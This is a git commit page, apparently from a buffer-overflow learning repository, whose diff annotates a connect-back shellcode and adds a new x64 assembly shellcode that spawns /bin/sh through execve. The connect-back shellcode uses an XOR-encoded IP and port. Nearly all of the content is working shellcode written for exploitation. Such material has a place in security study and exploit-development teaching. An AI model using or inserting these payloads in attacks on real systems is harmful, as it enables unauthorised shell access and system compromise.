Merge branch 'master' of github.com:freecoding/bufflow

author: toni <toni@devlap.local> 2015-04-13 12:48:50 +0200
committer: toni <toni@devlap.local> 2015-04-13 13:00:36 +0200
commit: de17c3e7e1f412dc39b1e9b08ab735dc14a9faaa (patch)
tree: e6c05412f532263bdcdeb3db909bafee51e76eaa /shellcode
parent: 844255f63087079326fc333601a218321ab97b3c (diff)
parent: bd18cd8c67fd97f6bf0dceffae68799730ec582c (diff)
2 files changed, 22 insertions, 2 deletions
diff --git a/shellcode/connect.asm b/shellcode/connect.asm
index 4c13b69..3464a3e 100644
--- a/shellcode/connect.asm
+++ b/shellcode/connect.asm
@@ -16,10 +16,10 @@ int		0x80		; let the kernel do the stuff
 mov		edx,eax		; move socket descriptor from socket() into eax
 xor		eax,eax
 ;   sockaddr_in: in_addr
-push		0x1011116E	; push ip adr on the stack (XOR-encoded)
+push		0x1011116E	; push ip adr on the stack (XOR-encoded -> 127.0.0.1)
 xor dword	[esp],0x11111111 ; decode ip adr
 ;   sockaddr_in: tcp port
-push word	0x2814		; push tcp port (XOR-encoded)
+push word	0x2814		; push tcp port (XOR-encoded -> 1337)
 xor word	[esp],0x1111 ; decode tcp port
 ;   sockaddr_in: sa_family
 push word	0x2    ; 0x2 -> AF_INET
diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm
new file mode 100644
index 0000000..6048796
--- /dev/null
+++ b/shellcode/execve_x64.asm
@@ -0,0 +1,20 @@
+BITS 64
+
+
+; do the 'string trick'
+jmp short string
+
+code:
+xor		rax,rax
+pop		rdi		; pop the addr of the string intro esi (stack pointer register)
+mov byte	[rdi + 7], al	; null-terminate the string
+push		rdi
+mov		rsi,rsp
+push		rax
+mov		rdx,rsp
+mov byte	al,59		; execv
+syscall
+
+string:
+call code
+db '/bin/sh' , 0xFF
author	toni <toni@devlap.local>	2015-04-13 12:48:50 +0200
committer	toni <toni@devlap.local>	2015-04-13 13:00:36 +0200
commit	de17c3e7e1f412dc39b1e9b08ab735dc14a9faaa (patch)
tree	e6c05412f532263bdcdeb3db909bafee51e76eaa /shellcode
parent	844255f63087079326fc333601a218321ab97b3c (diff)
parent	bd18cd8c67fd97f6bf0dceffae68799730ec582c (diff)